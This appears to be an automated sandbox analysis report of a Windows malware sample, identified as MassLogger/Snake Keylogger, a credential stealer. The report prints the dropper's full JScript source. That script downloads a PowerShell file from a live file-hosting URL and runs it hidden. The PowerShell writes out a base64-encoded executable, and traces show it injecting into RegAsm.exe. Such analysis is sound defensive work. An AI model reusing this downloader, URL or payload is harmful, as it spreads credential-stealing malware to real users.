                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:12:33:17
                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                      Imagebase:0x810000
                                                                                                      File size:139'776 bytes
                                                                                                      MD5 hash:9FB7455B1C6CB563FF7E58F422F3BC6E
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:12:33:17
                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                      Imagebase:0x280000
                                                                                                      File size:65'440 bytes
                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:12:33:17
                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                      Imagebase:0x960000
                                                                                                      File size:65'440 bytes
                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Call Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      callgraph clusterC0 clusterC2C0 clusterC4C0 clusterC6C0 clusterC8C0 clusterC10C8 clusterC12C8 clusterC14C0 clusterC16C14 clusterC18C14 clusterC20C14 clusterC22C14 clusterC24C14 clusterC30C0 clusterC32C30 clusterC26C0 clusterC28C26 clusterC34C0 clusterC36C34 E1C0 entry:C0 F3C2 CreateObject E1C0->F3C2 F5C4 CreateObject E1C0->F5C4 F7C6 CreateObject E1C0->F7C6 F35C34 _u E1C0->F35C34 F9C8 _i F11C10 FolderExists F9C8->F11C10 F13C12 CreateFolder F9C8->F13C12 F15C14 _j F17C16 Open F15C14->F17C16 F19C18 Send F15C14->F19C18 F21C20 CreateTextFile F15C14->F21C20 F23C22 Write F15C14->F23C22 F25C24 Close F15C14->F25C24 F27C26 _m F15C14->F27C26 F29C28 Echo F27C26->F29C28 F31C30 _q F31C30->F27C26 F33C32 Run F31C30->F33C32 F35C34->F9C8 F35C34->F15C14 F35C34->F27C26 F35C34->F31C30 F37C36 Quit F35C34->F37C36

                                                                                                      Script:

                                                                                                      Code
                                                                                                      0
                                                                                                      var _a = "https://files.catbox.moe/jqxrkk.ps1";
                                                                                                        1
                                                                                                        var _b = "C:\\Temp\\dddddd.ps1";
                                                                                                          2
                                                                                                          var _c = "C:\\Temp";
                                                                                                            3
                                                                                                            var _d = 200;
                                                                                                              4
                                                                                                              var _e = "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ";
                                                                                                                5
                                                                                                                var _f = WScript.CreateObject ( "WScript.Shell" );
                                                                                                                • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                                                                6
                                                                                                                var _g = WScript.CreateObject ( "Scripting.FileSystemObject" );
                                                                                                                • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
                                                                                                                7
                                                                                                                var _h = WScript.CreateObject ( "MSXML2.XMLHTTP" );
                                                                                                                • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
                                                                                                                8
                                                                                                                function _i() {
                                                                                                                • _i() ➔ undefined
                                                                                                                9
                                                                                                                if ( ! _g.FolderExists ( _c ) )
                                                                                                                • FolderExists("C:\Temp") ➔ false
                                                                                                                10
                                                                                                                {
                                                                                                                  11
                                                                                                                  _g.CreateFolder ( _c );
                                                                                                                  • CreateFolder("C:\Temp") ➔ C:\Temp
                                                                                                                  12
                                                                                                                  }
                                                                                                                    13
                                                                                                                    }
                                                                                                                      14
                                                                                                                      function _j(_k, _l) {
                                                                                                                      • _j("https://files.catbox.moe/jqxrkk.ps1","C:\Temp\dddddd.ps1") ➔ true
                                                                                                                      15
                                                                                                                      _h.Open ( "GET", _k, false );
                                                                                                                      • Open("GET","https://files.catbox.moe/jqxrkk.ps1",false) ➔ undefined
                                                                                                                      16
                                                                                                                      _h.Send ( );
                                                                                                                      • Send() ➔ undefined
                                                                                                                      17
                                                                                                                      if ( _h.Status !== _d )
                                                                                                                        18
                                                                                                                        {
                                                                                                                          19
                                                                                                                          _m ( "Download failed with status: " + _h.Status );
                                                                                                                            20
                                                                                                                            return false;
                                                                                                                              21
                                                                                                                              }
                                                                                                                                22
                                                                                                                                try
                                                                                                                                  23
                                                                                                                                  {
                                                                                                                                    24
                                                                                                                                    var _n = _g.CreateTextFile ( _l, true );
                                                                                                                                    • CreateTextFile("C:\Temp\dddddd.ps1",true) ➔
                                                                                                                                    25
                                                                                                                                    _n.Write ( _h.ResponseText );
                                                                                                                                    • Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe") [IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("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") ➔ undefined
                                                                                                                                    26
                                                                                                                                    _n.Close ( );
                                                                                                                                    • Close() ➔ undefined
                                                                                                                                    27
                                                                                                                                    return true;
                                                                                                                                      28
                                                                                                                                      }
                                                                                                                                        29
                                                                                                                                        catch ( _o )
                                                                                                                                          30
                                                                                                                                          {
                                                                                                                                            31
                                                                                                                                            _m ( "Error writing downloaded script: " + _o.message );
                                                                                                                                              32
                                                                                                                                              return false;
                                                                                                                                                33
                                                                                                                                                }
                                                                                                                                                  34
                                                                                                                                                  }
                                                                                                                                                    35
                                                                                                                                                    function _m(_p) {
                                                                                                                                                      36
                                                                                                                                                      WScript.Echo ( _p );
                                                                                                                                                        37
                                                                                                                                                        }
                                                                                                                                                          38
                                                                                                                                                          function _q(_r) {
                                                                                                                                                          • _q("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                                                                          39
                                                                                                                                                          try
                                                                                                                                                            40
                                                                                                                                                            {
                                                                                                                                                              41
                                                                                                                                                              var _s = _e + "\"" + _r + "\"";
                                                                                                                                                                42
                                                                                                                                                                _f.Run ( _s, 0, true );
                                                                                                                                                                • Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"",0,true) ➔ 0
                                                                                                                                                                43
                                                                                                                                                                }
                                                                                                                                                                  44
                                                                                                                                                                  catch ( _t )
                                                                                                                                                                    45
                                                                                                                                                                    {
                                                                                                                                                                      46
                                                                                                                                                                      _m ( "Failed to execute PowerShell script: " + _t.message );
                                                                                                                                                                        47
                                                                                                                                                                        }
                                                                                                                                                                          48
                                                                                                                                                                          }
                                                                                                                                                                            49
                                                                                                                                                                            function _u() {
                                                                                                                                                                            • _u() ➔ undefined
                                                                                                                                                                            50
                                                                                                                                                                            _i ( );
                                                                                                                                                                            • _i() ➔ undefined
                                                                                                                                                                            51
                                                                                                                                                                            if ( ! _j ( _a, _b ) )
                                                                                                                                                                            • _j("https://files.catbox.moe/jqxrkk.ps1","C:\Temp\dddddd.ps1") ➔ true
                                                                                                                                                                            52
                                                                                                                                                                            {
                                                                                                                                                                              53
                                                                                                                                                                              _m ( "Exiting script due to download failure." );
                                                                                                                                                                                54
                                                                                                                                                                                WScript.Quit ( );
                                                                                                                                                                                  55
                                                                                                                                                                                  }
                                                                                                                                                                                    56
                                                                                                                                                                                    _q ( _b );
                                                                                                                                                                                    • _q("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                                                                                                    57
                                                                                                                                                                                    }
                                                                                                                                                                                      58
                                                                                                                                                                                      _u ( );
                                                                                                                                                                                      • _u() ➔ undefined
                                                                                                                                                                                      Reset < >
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000001.00000002.1831570113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: e9526dc51fe2bfb761c863628886e59efc94e2649e9b7173c4d88ad59f2a0a65
                                                                                                                                                                                        • Instruction ID: 6c646523ce4f4043fe3bdd7db0fc63dc7fba3deea68218103d54701973dc5166
                                                                                                                                                                                        • Opcode Fuzzy Hash: e9526dc51fe2bfb761c863628886e59efc94e2649e9b7173c4d88ad59f2a0a65
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E826821B1EBDD0FE7669B7948645747BE1EF5A610B0A00FBD48CCB1E3D918AC06C791
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000001.00000002.1831570113.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: eb39c7b346bfacabc66e835ca45220af16a1ff61ee310fe88b1a6722e2816d5d
                                                                                                                                                                                        • Instruction ID: 1e686cbf42d05f6c950e2d1c9cbdbd88e4a7430b0d6b1212049095de5dfd7c90
                                                                                                                                                                                        • Opcode Fuzzy Hash: eb39c7b346bfacabc66e835ca45220af16a1ff61ee310fe88b1a6722e2816d5d
                                                                                                                                                                                        • Instruction Fuzzy Hash: CE110B22F2E92E4BE6B8576A197217822C1EF8CB10B560179E80DC31E6DE186F0146C1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000001.00000002.1831203998.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffd9b7e0000_powershell.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                        • Instruction ID: 4d55c4771c31011dba92b5743e22d0bb70f0ec7f4b61575d80b8a248a60c19b8
                                                                                                                                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                        • Instruction Fuzzy Hash: EF01A77020CB0C4FD748EF0CE091AAAB3E0FF99320F10056DE58AC36A1D632E882CB41

                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                        Execution Coverage:26.9%
                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                        Total number of Nodes:123
                                                                                                                                                                                        Total number of Limit Nodes:1
                                                                                                                                                                                        execution_graph 3261 e56374 3262 e56411 CreateProcessA 3261->3262 3264 e566b8 3262->3264 3244 e55830 3245 e55835 WriteProcessMemory 3244->3245 3247 e57587 3245->3247 3265 e5575c 3266 e55765 3265->3266 3268 e5583c WriteProcessMemory 3266->3268 3269 e557de Wow64SetThreadContext 3266->3269 3270 e55772 3266->3270 3272 e57587 3268->3272 3273 e56a5b 3269->3273 3112 e555f8 3114 e5561c 3112->3114 3113 e556f1 3114->3113 3117 e56139 3114->3117 3136 e55e78 3114->3136 3118 e55f02 3117->3118 3124 e56134 3118->3124 3155 e56269 3118->3155 3159 e56278 3118->3159 3119 e55f14 3163 e56851 3119->3163 3167 e56860 3119->3167 3120 e55fa6 3171 e56aa9 3120->3171 3175 e56ab8 3120->3175 3121 e560f5 3187 e57218 3121->3187 3122 e55ff0 3179 e56c49 3122->3179 3183 e56c58 3122->3183 3123 e5610d 3193 e575f8 3123->3193 3201 e575e8 3123->3201 3124->3113 3137 e55e88 3136->3137 3143 e56134 3137->3143 3150 e56269 CreateProcessA 3137->3150 3151 e56278 CreateProcessA 3137->3151 3138 e55f14 3144 e56851 Wow64SetThreadContext 3138->3144 3145 e56860 Wow64SetThreadContext 3138->3145 3139 e55fa6 3153 e56aa9 ReadProcessMemory 3139->3153 3154 e56ab8 ReadProcessMemory 3139->3154 3140 e560f5 3152 e57218 WriteProcessMemory 3140->3152 3141 e5610d 3148 e575e8 3 API calls 3141->3148 3149 e575f8 3 API calls 3141->3149 3142 e55ff0 3146 e56c49 VirtualAllocEx 3142->3146 3147 e56c58 VirtualAllocEx 3142->3147 3143->3113 3144->3139 3145->3139 3146->3140 3147->3140 3148->3143 3149->3143 3150->3138 3151->3138 3152->3141 3153->3142 3154->3142 3156 e56278 3155->3156 3209 e557cc 3156->3209 3160 e5629c 3159->3160 3161 e557cc CreateProcessA 3160->3161 3162 e56316 3161->3162 3162->3119 3164 e56860 3163->3164 3166 e568f8 3164->3166 3213 e557e4 3164->3213 3166->3120 3168 e5687c 3167->3168 3169 e557e4 Wow64SetThreadContext 3168->3169 3170 e568f8 3168->3170 3169->3170 3170->3120 3172 e56ab2 3171->3172 3217 e5580c 3172->3217 3176 e56ad5 3175->3176 3177 e5580c ReadProcessMemory 3176->3177 3178 e56afb 3177->3178 3178->3122 3180 e56c58 3179->3180 3221 e55824 3180->3221 3184 e56c7b 3183->3184 3185 e55824 VirtualAllocEx 3184->3185 3186 e56cc3 3185->3186 3186->3121 3192 e57242 3187->3192 3188 e573eb 3189 e5583c WriteProcessMemory 3188->3189 3190 e57423 3189->3190 3190->3123 3192->3188 3225 e5583c 3192->3225 3194 e5761f 3193->3194 3195 e5583c WriteProcessMemory 3194->3195 3196 e5768b 3195->3196 3199 e5773f 3196->3199 3229 e558d4 3196->3229 3233 e558ec 3199->3233 3200 e577d0 3200->3124 3202 e575f8 3201->3202 3203 e5583c WriteProcessMemory 3202->3203 3204 e5768b 3203->3204 3205 e558d4 Wow64SetThreadContext 3204->3205 3207 e5773f 3204->3207 3205->3207 3206 e558ec ResumeThread 3208 e577d0 3206->3208 3207->3206 3208->3124 3210 e56380 CreateProcessA 3209->3210 3212 e566b8 3210->3212 3214 e56998 Wow64SetThreadContext 3213->3214 3216 e56a5b 3214->3216 3216->3166 3218 e56b28 ReadProcessMemory 3217->3218 3220 e56afb 3218->3220 3220->3122 3222 e56d30 VirtualAllocEx 3221->3222 3224 e56cc3 3222->3224 3224->3121 3226 e574a0 WriteProcessMemory 3225->3226 3228 e57587 3226->3228 3228->3192 3231 e56998 Wow64SetThreadContext 3229->3231 3232 e56a5b 3231->3232 3232->3199 3234 e57840 ResumeThread 3233->3234 3236 e578cf 3234->3236 3236->3200 3237 e51bd8 3238 e51c25 VirtualProtect 3237->3238 3239 e51c91 3238->3239 3248 e555e8 3249 e5561c 3248->3249 3250 e556f1 3249->3250 3251 e56139 7 API calls 3249->3251 3252 e55e78 7 API calls 3249->3252 3251->3250 3252->3250 3253 e557d8 3254 e557dd Wow64SetThreadContext 3253->3254 3256 e56a5b 3254->3256 3274 e56d28 3275 e56d0f 3274->3275 3276 e56d2f VirtualAllocEx 3274->3276 3278 e56dee 3276->3278
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: \H$\H$tE$$fq$G$N
                                                                                                                                                                                        • API String ID: 0-3671665032
                                                                                                                                                                                        • Opcode ID: b328121e50596e5b934452489a505b6ab18940b2e0190958b21170da988cb3fc
                                                                                                                                                                                        • Instruction ID: fd69e53edf91162a37807e1ded2901ca6ec9f0252d1f4543e622c5764f760a81
                                                                                                                                                                                        • Opcode Fuzzy Hash: b328121e50596e5b934452489a505b6ab18940b2e0190958b21170da988cb3fc
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A52D474A01259CFDB64DFA9C980A8EFBB2BF49305F15D5A9E808AB211C730ADC5CF51
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: \H$\H$tE$$fq$G$N
                                                                                                                                                                                        • API String ID: 0-3671665032
                                                                                                                                                                                        • Opcode ID: f6a31a78791592e36b84e6590c2fed08bc57d05113f93fa9b13677d1c1639d73
                                                                                                                                                                                        • Instruction ID: 16b4d4f89570d5126d4aa38b78949ae064a21d747a4051bbfa6c5ce3816b0813
                                                                                                                                                                                        • Opcode Fuzzy Hash: f6a31a78791592e36b84e6590c2fed08bc57d05113f93fa9b13677d1c1639d73
                                                                                                                                                                                        • Instruction Fuzzy Hash: AED14AB0E052688FDB29CF69C8507DEBBB2BF89300F1484EAD549A7255DB304E85CF51
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: \H$\H$tE$$fq$G$N
                                                                                                                                                                                        • API String ID: 0-3671665032
                                                                                                                                                                                        • Opcode ID: 6003b1fc83b82458942c40138270e74ccaf22d1667b695515829e396993dc1a6
                                                                                                                                                                                        • Instruction ID: 7b13f0406cf4eed5c021a97d7d967510fa92982a42c3fe530a8f7f9565cbe916
                                                                                                                                                                                        • Opcode Fuzzy Hash: 6003b1fc83b82458942c40138270e74ccaf22d1667b695515829e396993dc1a6
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1BB1C5B4E012298FDB68DF66C940B9EBBB2BB89300F10D4EAD50DB7255DB305E858F51
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.1810247424.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_e50000_x.jbxd
